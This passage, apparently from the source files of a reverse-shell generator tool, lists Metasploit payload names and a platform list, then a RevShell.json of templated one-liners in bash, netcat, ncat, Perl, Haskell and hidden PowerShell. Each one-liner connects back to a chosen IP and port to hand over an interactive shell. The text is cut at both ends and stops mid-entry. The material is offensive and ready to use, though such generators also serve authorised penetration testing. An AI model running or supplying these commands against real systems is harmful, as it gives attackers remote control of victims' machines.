\"linux/x86/meterpreter/bind_tcp\" },\n\t{ \"value\": \"linux/x86/meterpreter/bind_tcp_uuid\" },\n\t{ \"value\": \"linux/x86/meterpreter/find_tag\" },\n\t{ \"value\": \"linux/x86/meterpreter/reverse_ipv6_tcp\" },\n\t{ \"value\": \"linux/x86/meterpreter/reverse_nonx_tcp\" },\n\t{ \"value\": \"linux/x86/meterpreter/reverse_tcp\" },\n\t{ \"value\": \"linux/x86/meterpreter/reverse_tcp_uuid\" },\n\t{ \"value\": \"linux/x86/meterpreter_reverse_http\" },\n\t{ \"value\": \"linux/x86/meterpreter_reverse_https\" },\n\t{ \"value\": \"linux/x86/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"linux/x86/metsvc_bind_tcp\" },\n\t{ \"value\": \"linux/x86/metsvc_reverse_tcp\" },\n\t{ \"value\": \"linux/x86/read_file\" },\n\t{ \"value\": \"linux/x86/shell/bind_ipv6_tcp\" },\n\t{ \"value\": \"linux/x86/shell/bind_ipv6_tcp_uuid\" },\n\t{ \"value\": \"linux/x86/shell/bind_nonx_tcp\" },\n\t{ \"value\": \"linux/x86/shell/bind_tcp\" },\n\t{ \"value\": \"linux/x86/shell/bind_tcp_uuid\" },\n\t{ \"value\": \"linux/x86/shell/find_tag\" },\n\t{ \"value\": \"linux/x86/shell/reverse_ipv6_tcp\" },\n\t{ \"value\": \"linux/x86/shell/reverse_nonx_tcp\" },\n\t{ \"value\": \"linux/x86/shell/reverse_tcp\" },\n\t{ \"value\": \"linux/x86/shell/reverse_tcp_uuid\" },\n\t{ \"value\": \"linux/x86/shell_bind_ipv6_tcp\" },\n\t{ \"value\": \"linux/x86/shell_bind_tcp\" },\n\t{ \"value\": \"linux/x86/shell_bind_tcp_random_port\" },\n\t{ \"value\": \"linux/x86/shell_find_port\" },\n\t{ \"value\": \"linux/x86/shell_find_tag\" },\n\t{ \"value\": \"linux/x86/shell_reverse_tcp\" },\n\t{ \"value\": \"linux/x86/shell_reverse_tcp_ipv6\" },\n\t{ \"value\": \"linux/zarch/meterpreter_reverse_http\" },\n\t{ \"value\": \"linux/zarch/meterpreter_reverse_https\" },\n\t{ \"value\": \"linux/zarch/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"mainframe/shell_reverse_tcp\" },\n\t{ \"value\": \"multi/meterpreter/reverse_http\" },\n\t{ \"value\": \"multi/meterpreter/reverse_https\" },\n\t{ \"value\": \"netware/shell/reverse_tcp\" },\n\t{ \"value\": \"nodejs/shell_bind_tcp\" },\n\t{ \"value\": \"nodejs/shell_reverse_tcp\" },\n\t{ \"value\": \"nodejs/shell_reverse_tcp_ssl\" },\n\t{ \"value\": \"osx/armle/execute/bind_tcp\" },\n\t{ \"value\": \"osx/armle/execute/reverse_tcp\" },\n\t{ \"value\": \"osx/armle/shell/bind_tcp\" },\n\t{ \"value\": \"osx/armle/shell/reverse_tcp\" },\n\t{ \"value\": \"osx/armle/shell_bind_tcp\" },\n\t{ \"value\": \"osx/armle/shell_reverse_tcp\" },\n\t{ \"value\": \"osx/armle/vibrate\" },\n\t{ \"value\": \"osx/ppc/shell/bind_tcp\" },\n\t{ \"value\": \"osx/ppc/shell/find_tag\" },\n\t{ \"value\": \"osx/ppc/shell/reverse_tcp\" },\n\t{ \"value\": \"osx/ppc/shell_bind_tcp\" },\n\t{ \"value\": \"osx/ppc/shell_reverse_tcp\" },\n\t{ \"value\": \"osx/x64/dupandexecve/bind_tcp\" },\n\t{ \"value\": \"osx/x64/dupandexecve/reverse_tcp\" },\n\t{ \"value\": \"osx/x64/exec\" },\n\t{ \"value\": \"osx/x64/meterpreter/bind_tcp\" },\n\t{ \"value\": \"osx/x64/meterpreter/reverse_tcp\" },\n\t{ \"value\": \"osx/x64/meterpreter_reverse_http\" },\n\t{ \"value\": \"osx/x64/meterpreter_reverse_https\" },\n\t{ \"value\": \"osx/x64/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"osx/x64/say\" },\n\t{ \"value\": \"osx/x64/shell_bind_tcp\" },\n\t{ \"value\": \"osx/x64/shell_find_tag\" },\n\t{ \"value\": \"osx/x64/shell_reverse_tcp\" },\n\t{ \"value\": \"osx/x86/bundleinject/bind_tcp\" },\n\t{ \"value\": \"osx/x86/bundleinject/reverse_tcp\" },\n\t{ \"value\": \"osx/x86/exec\" },\n\t{ \"value\": \"osx/x86/isight/bind_tcp\" },\n\t{ \"value\": \"osx/x86/isight/reverse_tcp\" },\n\t{ \"value\": \"osx/x86/shell_bind_tcp\" },\n\t{ \"value\": \"osx/x86/shell_find_port\" },\n\t{ \"value\": \"osx/x86/shell_reverse_tcp\" },\n\t{ \"value\": \"osx/x86/vforkshell/bind_tcp\" },\n\t{ \"value\": \"osx/x86/vforkshell/reverse_tcp\" },\n\t{ \"value\": \"osx/x86/vforkshell_bind_tcp\" },\n\t{ \"value\": \"osx/x86/vforkshell_reverse_tcp\" },\n\t{ \"value\": \"php/bind_perl\" },\n\t{ \"value\": \"php/bind_perl_ipv6\" },\n\t{ \"value\": \"php/bind_php\" },\n\t{ \"value\": \"php/bind_php_ipv6\" },\n\t{ \"value\": \"php/download_exec\" },\n\t{ \"value\": \"php/exec\" },\n\t{ \"value\": \"php/meterpreter/bind_tcp\" },\n\t{ \"value\": \"php/meterpreter/bind_tcp_ipv6\" },\n\t{ \"value\": \"php/meterpreter/bind_tcp_ipv6_uuid\" },\n\t{ \"value\": \"php/meterpreter/bind_tcp_uuid\" },\n\t{ \"value\": \"php/meterpreter/reverse_tcp\" },\n\t{ \"value\": \"php/meterpreter/reverse_tcp_uuid\" },\n\t{ \"value\": \"php/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"php/reverse_perl\" },\n\t{ \"value\": \"php/reverse_php\" },\n\t{ \"value\": \"php/shell_findsock\" },\n\t{ \"value\": \"python/meterpreter/bind_tcp\" },\n\t{ \"value\": \"python/meterpreter/bind_tcp_uuid\" },\n\t{ \"value\": \"python/meterpreter/reverse_http\" },\n\t{ \"value\": \"python/meterpreter/reverse_https\" },\n\t{ \"value\": \"python/meterpreter/reverse_tcp\" },\n\t{ \"value\": \"python/meterpreter/reverse_tcp_ssl\" },\n\t{ \"value\": \"python/meterpreter/reverse_tcp_uuid\" },\n\t{ \"value\": \"python/meterpreter_bind_tcp\" },\n\t{ \"value\": \"python/meterpreter_reverse_http\" },\n\t{ \"value\": \"python/meterpreter_reverse_https\" },\n\t{ \"value\": \"python/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"python/shell_bind_tcp\" },\n\t{ \"value\": \"python/shell_reverse_tcp\" },\n\t{ \"value\": \"python/shell_reverse_tcp_ssl\" },\n\t{ \"value\": \"python/shell_reverse_udp\" },\n\t{ \"value\": \"r/shell_bind_tcp\" },\n\t{ \"value\": \"r/shell_reverse_tcp\" },\n\t{ \"value\": \"ruby/shell_bind_tcp\" },\n\t{ \"value\": \"ruby/shell_bind_tcp_ipv6\" },\n\t{ \"value\": \"ruby/shell_reverse_tcp\" },\n\t{ \"value\": \"ruby/shell_reverse_tcp_ssl\" },\n\t{ \"value\": \"solaris/sparc/shell_bind_tcp\" },\n\t{ \"value\": \"solaris/sparc/shell_find_port\" },\n\t{ \"value\": \"solaris/sparc/shell_reverse_tcp\" },\n\t{ \"value\": \"solaris/x86/shell_bind_tcp\" },\n\t{ \"value\": \"solaris/x86/shell_find_port\" },\n\t{ \"value\": \"solaris/x86/shell_reverse_tcp\" },\n\t{ \"value\": \"tty/unix/interact\" },\n\t{ \"value\": \"windows/adduser\" },\n\t{ \"value\": \"windows/dllinject/bind_hidden_ipknock_tcp\" },\n\t{ \"value\": \"windows/dllinject/bind_hidden_tcp\" },\n\t{ \"value\": \"windows/dllinject/bind_ipv6_tcp\" },\n\t{ \"value\": \"windows/dllinject/bind_ipv6_tcp_uuid\" },\n\t{ \"value\": \"windows/dllinject/bind_named_pipe\" },\n\t{ \"value\": \"windows/dllinject/bind_nonx_tcp\" },\n\t{ \"value\": \"windows/dllinject/bind_tcp\" },\n\t{ \"value\": \"windows/dllinject/bind_tcp_rc4\" },\n\t{ \"value\": \"windows/dllinject/bind_tcp_uuid\" },\n\t{ \"value\": \"windows/dllinject/find_tag\" },\n\t{ \"value\": \"windows/dllinject/reverse_hop_http\" },\n\t{ \"value\": \"windows/dllinject/reverse_http\" },\n\t{ \"value\": \"windows/dllinject/reverse_http_proxy_pstore\" },\n\t{ \"value\": \"windows/dllinject/reverse_ipv6_tcp\" },\n\t{ \"value\": \"windows/dllinject/reverse_nonx_tcp\" },\n\t{ \"value\": \"windows/dllinject/reverse_ord_tcp\" },\n\t{ \"value\": \"windows/dllinject/reverse_tcp\" },\n\t{ \"value\": \"windows/dllinject/reverse_tcp_allports\" },\n\t{ \"value\": \"windows/dllinject/reverse_tcp_dns\" },\n\t{ \"value\": \"windows/dllinject/reverse_tcp_rc4\" },\n\t{ \"value\": \"windows/dllinject/reverse_tcp_rc4_dns\" },\n\t{ \"value\": \"windows/dllinject/reverse_tcp_uuid\" },\n\t{ \"value\": \"windows/dllinject/reverse_udp\" },\n\t{ \"value\": \"windows/dllinject/reverse_winhttp\" },\n\t{ \"value\": \"windows/dns_txt_query_exec\" },\n\t{ \"value\": \"windows/download_exec\" },\n\t{ \"value\": \"windows/exec\" },\n\t{ \"value\": \"windows/format_all_drives\" },\n\t{ \"value\": \"windows/loadlibrary\" },\n\t{ \"value\": \"windows/messagebox\" },\n\t{ \"value\": \"windows/meterpreter/bind_hidden_ipknock_tcp\" },\n\t{ \"value\": \"windows/meterpreter/bind_hidden_tcp\" },\n\t{ \"value\": \"windows/meterpreter/bind_ipv6_tcp\" },\n\t{ \"value\": \"windows/meterpreter/bind_ipv6_tcp_uuid\" },\n\t{ \"value\": \"windows/meterpreter/bind_named_pipe\" },\n\t{ \"value\": \"windows/meterpreter/bind_nonx_tcp\" },\n\t{ \"value\": \"windows/meterpreter/bind_tcp\" },\n\t{ \"value\": \"windows/meterpreter/bind_tcp_rc4\" },\n\t{ \"value\": \"windows/meterpreter/bind_tcp_uuid\" },\n\t{ \"value\": \"windows/meterpreter/find_tag\" },\n\t{ \"value\": \"windows/meterpreter/reverse_hop_http\" },\n\t{ \"value\": \"windows/meterpreter/reverse_http\" },\n\t{ \"value\": \"windows/meterpreter/reverse_http_proxy_pstore\" },\n\t{ \"value\": \"windows/meterpreter/reverse_https\" },\n\t{ \"value\": \"windows/meterpreter/reverse_https_proxy\" },\n\t{ \"value\": \"windows/meterpreter/reverse_ipv6_tcp\" },\n\t{ \"value\": \"windows/meterpreter/reverse_named_pipe\" },\n\t{ \"value\": \"windows/meterpreter/reverse_nonx_tcp\" },\n\t{ \"value\": \"windows/meterpreter/reverse_ord_tcp\" },\n\t{ \"value\": \"windows/meterpreter/reverse_tcp\" },\n\t{ \"value\": \"windows/meterpreter/reverse_tcp_allports\" },\n\t{ \"value\": \"windows/meterpreter/reverse_tcp_dns\" },\n\t{ \"value\": \"windows/meterpreter/reverse_tcp_rc4\" },\n\t{ \"value\": \"windows/meterpreter/reverse_tcp_rc4_dns\" },\n\t{ \"value\": \"windows/meterpreter/reverse_tcp_uuid\" },\n\t{ \"value\": \"windows/meterpreter/reverse_udp\" },\n\t{ \"value\": \"windows/meterpreter/reverse_winhttp\" },\n\t{ \"value\": \"windows/meterpreter/reverse_winhttps\" },\n\t{ \"value\": \"windows/meterpreter_bind_named_pipe\" },\n\t{ \"value\": \"windows/meterpreter_bind_tcp\" },\n\t{ \"value\": \"windows/meterpreter_reverse_http\" },\n\t{ \"value\": \"windows/meterpreter_reverse_https\" },\n\t{ \"value\": \"windows/meterpreter_reverse_ipv6_tcp\" },\n\t{ \"value\": \"windows/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"windows/metsvc_bind_tcp\" },\n\t{ \"value\": \"windows/metsvc_reverse_tcp\" },\n\t{ \"value\": \"windows/patchupdllinject/bind_hidden_ipknock_tcp\" },\n\t{ \"value\": \"windows/patchupdllinject/bind_hidden_tcp\" },\n\t{ \"value\": \"windows/patchupdllinject/bind_ipv6_tcp\" },\n\t{ \"value\": \"windows/patchupdllinject/bind_ipv6_tcp_uuid\" },\n\t{ \"value\": \"windows/patchupdllinject/bind_named_pipe\" },\n\t{ \"value\": \"windows/patchupdllinject/bind_nonx_tcp\" },\n\t{ \"value\": \"windows/patchupdllinject/bind_tcp\" },\n\t{ \"value\": \"windows/patchupdllinject/bind_tcp_rc4\" },\n\t{ \"value\": \"windows/patchupdllinject/bind_tcp_uuid\" },\n\t{ \"value\": \"windows/patchupdllinject/find_tag\" },\n\t{ \"value\": \"windows/patchupdllinject/reverse_ipv6_tcp\" },\n\t{ \"value\": \"windows/patchupdllinject/reverse_nonx_tcp\" },\n\t{ \"value\": \"windows/patchupdllinject/reverse_ord_tcp\" },\n\t{ \"value\": \"windows/patchupdllinject/reverse_tcp\" },\n\t{ \"value\": \"windows/patchupdllinject/reverse_tcp_allports\" },\n\t{ \"value\": \"windows/patchupdllinject/reverse_tcp_dns\" },\n\t{ \"value\": \"windows/patchupdllinject/reverse_tcp_rc4\" },\n\t{ \"value\": \"windows/patchupdllinject/reverse_tcp_rc4_dns\" },\n\t{ \"value\": \"windows/patchupdllinject/reverse_tcp_uuid\" },\n\t{ \"value\": \"windows/patchupdllinject/reverse_udp\" },\n\t{ \"value\": \"windows/patchupmeterpreter/bind_hidden_ipknock_tcp\" },\n\t{ \"value\": \"windows/patchupmeterpreter/bind_hidden_tcp\" },\n\t{ \"value\": \"windows/patchupmeterpreter/bind_ipv6_tcp\" },\n\t{ \"value\": \"windows/patchupmeterpreter/bind_ipv6_tcp_uuid\" },\n\t{ \"value\": \"windows/patchupmeterpreter/bind_named_pipe\" },\n\t{ \"value\": \"windows/patchupmeterpreter/bind_nonx_tcp\" },\n\t{ \"value\": \"windows/patchupmeterpreter/bind_tcp\" },\n\t{ \"value\": \"windows/patchupmeterpreter/bind_tcp_rc4\" },\n\t{ \"value\": \"windows/patchupmeterpreter/bind_tcp_uuid\" },\n\t{ \"value\": \"windows/patchupmeterpreter/find_tag\" },\n\t{ \"value\": \"windows/patchupmeterpreter/reverse_ipv6_tcp\" },\n\t{ \"value\": \"windows/patchupmeterpreter/reverse_nonx_tcp\" },\n\t{ \"value\": \"windows/patchupmeterpreter/reverse_ord_tcp\" },\n\t{ \"value\": \"windows/patchupmeterpreter/reverse_tcp\" },\n\t{ \"value\": \"windows/patchupmeterpreter/reverse_tcp_allports\" },\n\t{ \"value\": \"windows/patchupmeterpreter/reverse_tcp_dns\" },\n\t{ \"value\": \"windows/patchupmeterpreter/reverse_tcp_rc4\" },\n\t{ \"value\": \"windows/patchupmeterpreter/reverse_tcp_rc4_dns\" },\n\t{ \"value\": \"windows/patchupmeterpreter/reverse_tcp_uuid\" },\n\t{ \"value\": \"windows/patchupmeterpreter/reverse_udp\" },\n\t{ \"value\": \"windows/powershell_bind_tcp\" },\n\t{ \"value\": \"windows/powershell_reverse_tcp\" },\n\t{ \"value\": \"windows/shell/bind_hidden_ipknock_tcp\" },\n\t{ \"value\": \"windows/shell/bind_hidden_tcp\" },\n\t{ \"value\": \"windows/shell/bind_ipv6_tcp\" },\n\t{ \"value\": \"windows/shell/bind_ipv6_tcp_uuid\" },\n\t{ \"value\": \"windows/shell/bind_named_pipe\" },\n\t{ \"value\": \"windows/shell/bind_nonx_tcp\" },\n\t{ \"value\": \"windows/shell/bind_tcp\" },\n\t{ \"value\": \"windows/shell/bind_tcp_rc4\" },\n\t{ \"value\": \"windows/shell/bind_tcp_uuid\" },\n\t{ \"value\": \"windows/shell/find_tag\" },\n\t{ \"value\": \"windows/shell/reverse_ipv6_tcp\" },\n\t{ \"value\": \"windows/shell/reverse_nonx_tcp\" },\n\t{ \"value\": \"windows/shell/reverse_ord_tcp\" },\n\t{ \"value\": \"windows/shell/reverse_tcp\" },\n\t{ \"value\": \"windows/shell/reverse_tcp_allports\" },\n\t{ \"value\": \"windows/shell/reverse_tcp_dns\" },\n\t{ \"value\": \"windows/shell/reverse_tcp_rc4\" },\n\t{ \"value\": \"windows/shell/reverse_tcp_rc4_dns\" },\n\t{ \"value\": \"windows/shell/reverse_tcp_uuid\" },\n\t{ \"value\": \"windows/shell/reverse_udp\" },\n\t{ \"value\": \"windows/shell_bind_tcp\" },\n\t{ \"value\": \"windows/shell_bind_tcp_xpfw\" },\n\t{ \"value\": \"windows/shell_hidden_bind_tcp\" },\n\t{ \"value\": \"windows/shell_reverse_tcp\" },\n\t{ \"value\": \"windows/speak_pwned\" },\n\t{ \"value\": \"windows/upexec/bind_hidden_ipknock_tcp\" },\n\t{ \"value\": \"windows/upexec/bind_hidden_tcp\" },\n\t{ \"value\": \"windows/upexec/bind_ipv6_tcp\" },\n\t{ \"value\": \"windows/upexec/bind_ipv6_tcp_uuid\" },\n\t{ \"value\": \"windows/upexec/bind_named_pipe\" },\n\t{ \"value\": \"windows/upexec/bind_nonx_tcp\" },\n\t{ \"value\": \"windows/upexec/bind_tcp\" },\n\t{ \"value\": \"windows/upexec/bind_tcp_rc4\" },\n\t{ \"value\": \"windows/upexec/bind_tcp_uuid\" },\n\t{ \"value\": \"windows/upexec/find_tag\" },\n\t{ \"value\": \"windows/upexec/reverse_ipv6_tcp\" },\n\t{ \"value\": \"windows/upexec/reverse_nonx_tcp\" },\n\t{ \"value\": \"windows/upexec/reverse_ord_tcp\" },\n\t{ \"value\": \"windows/upexec/reverse_tcp\" },\n\t{ \"value\": \"windows/upexec/reverse_tcp_allports\" },\n\t{ \"value\": \"windows/upexec/reverse_tcp_dns\" },\n\t{ \"value\": \"windows/upexec/reverse_tcp_rc4\" },\n\t{ \"value\": \"windows/upexec/reverse_tcp_rc4_dns\" },\n\t{ \"value\": \"windows/upexec/reverse_tcp_uuid\" },\n\t{ \"value\": \"windows/upexec/reverse_udp\" },\n\t{ \"value\": \"windows/vncinject/bind_hidden_ipknock_tcp\" },\n\t{ \"value\": \"windows/vncinject/bind_hidden_tcp\" },\n\t{ \"value\": \"windows/vncinject/bind_ipv6_tcp\" },\n\t{ \"value\": \"windows/vncinject/bind_ipv6_tcp_uuid\" },\n\t{ \"value\": \"windows/vncinject/bind_named_pipe\" },\n\t{ \"value\": \"windows/vncinject/bind_nonx_tcp\" },\n\t{ \"value\": \"windows/vncinject/bind_tcp\" },\n\t{ \"value\": \"windows/vncinject/bind_tcp_rc4\" },\n\t{ \"value\": \"windows/vncinject/bind_tcp_uuid\" },\n\t{ \"value\": \"windows/vncinject/find_tag\" },\n\t{ \"value\": \"windows/vncinject/reverse_hop_http\" },\n\t{ \"value\": \"windows/vncinject/reverse_http\" },\n\t{ \"value\": \"windows/vncinject/reverse_http_proxy_pstore\" },\n\t{ \"value\": \"windows/vncinject/reverse_ipv6_tcp\" },\n\t{ \"value\": \"windows/vncinject/reverse_nonx_tcp\" },\n\t{ \"value\": \"windows/vncinject/reverse_ord_tcp\" },\n\t{ \"value\": \"windows/vncinject/reverse_tcp\" },\n\t{ \"value\": \"windows/vncinject/reverse_tcp_allports\" },\n\t{ \"value\": \"windows/vncinject/reverse_tcp_dns\" },\n\t{ \"value\": \"windows/vncinject/reverse_tcp_rc4\" },\n\t{ \"value\": \"windows/vncinject/reverse_tcp_rc4_dns\" },\n\t{ \"value\": \"windows/vncinject/reverse_tcp_uuid\" },\n\t{ \"value\": \"windows/vncinject/reverse_udp\" },\n\t{ \"value\": \"windows/vncinject/reverse_winhttp\" },\n\t{ \"value\": \"windows/x64/exec\" },\n\t{ \"value\": \"windows/x64/loadlibrary\" },\n\t{ \"value\": \"windows/x64/meterpreter/bind_ipv6_tcp\" },\n\t{ \"value\": \"windows/x64/meterpreter/bind_ipv6_tcp_uuid\" },\n\t{ \"value\": \"windows/x64/meterpreter/bind_named_pipe\" },\n\t{ \"value\": \"windows/x64/meterpreter/bind_tcp\" },\n\t{ \"value\": \"windows/x64/meterpreter/bind_tcp_uuid\" },\n\t{ \"value\": \"windows/x64/meterpreter/reverse_http\" },\n\t{ \"value\": \"windows/x64/meterpreter/reverse_https\" },\n\t{ \"value\": \"windows/x64/meterpreter/reverse_named_pipe\" },\n\t{ \"value\": \"windows/x64/meterpreter/reverse_tcp\" },\n\t{ \"value\": \"windows/x64/meterpreter/reverse_tcp_rc4\" },\n\t{ \"value\": \"windows/x64/meterpreter/reverse_tcp_uuid\" },\n\t{ \"value\": \"windows/x64/meterpreter/reverse_winhttp\" },\n\t{ \"value\": \"windows/x64/meterpreter/reverse_winhttps\" },\n\t{ \"value\": \"windows/x64/meterpreter_bind_named_pipe\" },\n\t{ \"value\": \"windows/x64/meterpreter_bind_tcp\" },\n\t{ \"value\": \"windows/x64/meterpreter_reverse_http\" },\n\t{ \"value\": \"windows/x64/meterpreter_reverse_https\" },\n\t{ \"value\": \"windows/x64/meterpreter_reverse_ipv6_tcp\" },\n\t{ \"value\": \"windows/x64/meterpreter_reverse_tcp\" },\n\t{ \"value\": \"windows/x64/powershell_bind_tcp\" },\n\t{ \"value\": \"windows/x64/powershell_reverse_tcp\" },\n\t{ \"value\": \"windows/x64/shell/bind_ipv6_tcp\" },\n\t{ \"value\": \"windows/x64/shell/bind_ipv6_tcp_uuid\" },\n\t{ \"value\": \"windows/x64/shell/bind_named_pipe\" },\n\t{ \"value\": \"windows/x64/shell/bind_tcp\" },\n\t{ \"value\": \"windows/x64/shell/bind_tcp_uuid\" },\n\t{ \"value\": \"windows/x64/shell/reverse_tcp\" },\n\t{ \"value\": \"windows/x64/shell/reverse_tcp_rc4\" },\n\t{ \"value\": \"windows/x64/shell/reverse_tcp_uuid\" },\n\t{ \"value\": \"windows/x64/shell_bind_tcp\" },\n\t{ \"value\": \"windows/x64/shell_reverse_tcp\" },\n\t{ \"value\": \"windows/x64/vncinject/bind_ipv6_tcp\" },\n\t{ \"value\": \"windows/x64/vncinject/bind_ipv6_tcp_uuid\" },\n\t{ \"value\": \"windows/x64/vncinject/bind_named_pipe\" },\n\t{ \"value\": \"windows/x64/vncinject/bind_tcp\" },\n\t{ \"value\": \"windows/x64/vncinject/bind_tcp_uuid\" },\n\t{ \"value\": \"windows/x64/vncinject/reverse_http\" },\n\t{ \"value\": \"windows/x64/vncinject/reverse_https\" },\n\t{ \"value\": \"windows/x64/vncinject/reverse_tcp\" },\n\t{ \"value\": \"windows/x64/vncinject/reverse_tcp_rc4\" },\n\t{ \"value\": \"windows/x64/vncinject/reverse_tcp_uuid\" },\n\t{ \"value\": \"windows/x64/vncinject/reverse_winhttp\" },\n\t{ \"value\": \"windows/x64/vncinject/reverse_winhttps\" }\n]\n" }, { "path": "src/assets/data/Platform.json", "content": "[\n\t{ \"value\": \"aix\" },\n\t{ \"value\": \"android\" },\n\t{ \"value\": \"apple_ios\" },\n\t{ \"value\": \"bsd\" },\n\t{ \"value\": \"bsdi\" },\n\t{ \"value\": \"cisco\" },\n\t{ \"value\": \"firefox\" },\n\t{ \"value\": \"freebsd\" },\n\t{ \"value\": \"hardware\" },\n\t{ \"value\": \"hpux\" },\n\t{ \"value\": \"irix\" },\n\t{ \"value\": \"java\" },\n\t{ \"value\": \"javascript\" },\n\t{ \"value\": \"juniper\" },\n\t{ \"value\": \"linux\" },\n\t{ \"value\": \"mainframe\" },\n\t{ \"value\": \"multi\" },\n\t{ \"value\": \"netbsd\" },\n\t{ \"value\": \"netware\" },\n\t{ \"value\": \"nodejs\" },\n\t{ \"value\": \"openbsd\" },\n\t{ \"value\": \"osx\" },\n\t{ \"value\": \"php\" },\n\t{ \"value\": \"python\" },\n\t{ \"value\": \"r\" },\n\t{ \"value\": \"ruby\" },\n\t{ \"value\": \"solaris\" },\n\t{ \"value\": \"unix\" },\n\t{ \"value\": \"windows\" }\n]\n" }, { "path": "src/assets/data/RevShell.json", "content": "[\n {\n \"name\": \"Bash -i\",\n \"command\": \"{shell} -i >& /dev/tcp/${values.ip}/${values.port} 0>&1\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"Bash 196\",\n \"command\": \"0<&196;exec 196<>/dev/tcp/${values.ip}/${values.port}; {shell} <&196 >&196 2>&196\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"Bash read line\",\n \"command\": \"exec 5<>/dev/tcp/${values.ip}/${values.port};cat <&5 | while read line; do $line 2>&5 >&5; done\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"Bash 5\",\n \"command\": \"{shell} -i 5<> /dev/tcp/${values.ip}/${values.port} 0<&5 1>&5 2>&5\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"Bash udp\",\n \"command\": \"{shell} -i >& /dev/udp/${values.ip}/${values.port} 0>&1\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"nc mkfifo\",\n \"command\": \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc ${values.ip} ${values.port} >/tmp/f\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"nc -e\",\n \"command\": \"nc ${values.ip} ${values.port} -e {shell}\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"nc.exe -e\",\n \"command\": \"nc.exe ${values.ip} ${values.port} -e {shell}\",\n \"tags\": [\n \"windows\"\n ]\n },\n {\n \"name\": \"nc -c\",\n \"command\": \"nc -c {shell} ${values.ip} ${values.port}\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"ncat -e\",\n \"command\": \"ncat ${values.ip} ${values.port} -e {shell}\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"ncat.exe -e\",\n \"command\": \"ncat.exe ${values.ip} ${values.port} -e {shell}\",\n \"tags\": [\n \"windows\"\n ]\n },\n {\n \"name\": \"ncat udp\",\n \"command\": \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|ncat -u ${values.ip} ${values.port} >/tmp/f\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"rustcat\",\n \"command\": \"rcat ${values.ip} ${values.port} -r {shell}\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"Haskell #1\",\n \"command\": \"module Main where\\n\\nimport System.Process\\n\\nmain = callCommand \\\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | {shell} -i 2>&1 | nc ${values.ip} ${values.port} >/tmp/f\\\"\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"Perl\",\n \"command\": \"perl -e 'use Socket;$i=\\\"${values.ip}\\\";$p=${values.port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\\">&S\\\");open(STDOUT,\\\">&S\\\");open(STDERR,\\\">&S\\\");exec(\\\"{shell} -i\\\");};'\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"Perl no sh\",\n \"command\": \"perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\\\"${values.ip}:${values.port}\\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\",\n \"tags\": [\n \"linux\",\n \"mac\"\n ]\n },\n {\n \"name\": \"PowerShell #1\",\n \"command\": \"powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\\\"${values.ip}\\\",${values.port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \\\"PS \\\" + (pwd).Path + \\\"> \\\";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\",\n \"tags\": [\n \"windows\"\n ]\n },\n {\n \"name\": \"PowerShell #2\",\n \"command\": \"powershell -nop -c \\\"$client = New-Object System.Net.Sockets.TCPClient('${values.ip}',${values.port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\\"\",\n \"tags\": [\n \"windows\"\n ]\n },\n {\n \"name\": \"PowerShell #3\",\n \"command\": \"powershell -nop -W hidden -noni -ep bypass -c \\\"$TCPClient = New-Object Net.Sockets.TCPClient('${values.ip}', ${values.port});$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()\\\"\",\n \"tags\": [\n \"windows\"\n ]\n },\n {\n \"name\": \"PowerShell #4 (TLS)\",\n \"command\": \"powershell -nop -W hidden -noni 